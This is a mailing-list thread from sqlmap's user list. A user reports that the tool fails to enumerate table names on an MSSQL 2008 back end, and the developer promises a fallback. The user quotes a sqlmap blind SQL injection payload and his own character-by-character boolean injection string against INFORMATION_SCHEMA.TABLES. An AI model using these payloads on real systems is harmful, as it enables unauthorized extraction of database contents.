Hi Cats.
This should be implemented this moment (as a backup plan if normal
retrieval of table names fails for whatever (read: privileges) reason)
Kind regards,
Miroslav Stampar
On Wed, Jan 4, 2012 at 12:50 PM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:
> Hi Cats.
>
> Please, wait for day or two and you'll hopefully be able to use sqlmap in
> that case too.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Jan 2, 2012 at 8:01 PM, cats <d...@alcor.se> wrote:
>
>> I can dump users and databases, but not the tables in any database.
>>
>> Here's some output from sqlmap:
>>
>> Revision: 4643
>>
>> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows Vista
>> web application technology: ASP.NET, Microsoft IIS 7.0
>> back-end DBMS: Microsoft SQL Server 2008
>>
>> [18:58:04] [INFO] fetching tables for database: productcatalog
>> [18:58:04] [INFO] fetching number of tables for database
>> 'productcatalog'
>> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
>> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> eservice_productcatalog..sysobjects WHERE xtype IN
>> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
>> [18:58:05] [DEBUG] reflective value found and filtered out
>>
>> It just goes on like this and simply spits out a "retrieved" which is
>> empty, and it will continue doing so until it has reached the length of
>> the current table. Thus the result will be something like:
>>
>> dbo.""
>> dbo.""
>> dbo.""
>>
>> ...and so on
>>
>> I wrote a Perl script that could successfully extract the tables from my
>> database, using the following injection string.
>>
>> Clean version of the injection:
>>
>> AND (
>> CASE
>> WHEN SUBSTRING((
>> SELECT TOP 1 TABLE_NAME FROM (
>> SELECT TOP ' . $i . ' TABLE_NAME FROM
>> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
>> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
>> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>>
>> So the important part is "SELECT TABLE_NAME FROM
>> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
>> WHERE xtype = 'U'" Doesn't seem to work for me.
>>
>> Has anyone else had this issue?
>> Am I doing something wrong, or is this a bug in sqlmap?
>> Or maybe it's the configuration on my mssql server?
>>
>> Anyway, advice is welcome :-)
>>
>> Cheers!
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
>> infrastructure or vast IT resources to deliver seamless, secure access to
>> virtual desktops. With this all-in-one solution, easily deploy virtual
>> desktops for less than the cost of PCs and save 60% on VDI infrastructure
>> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
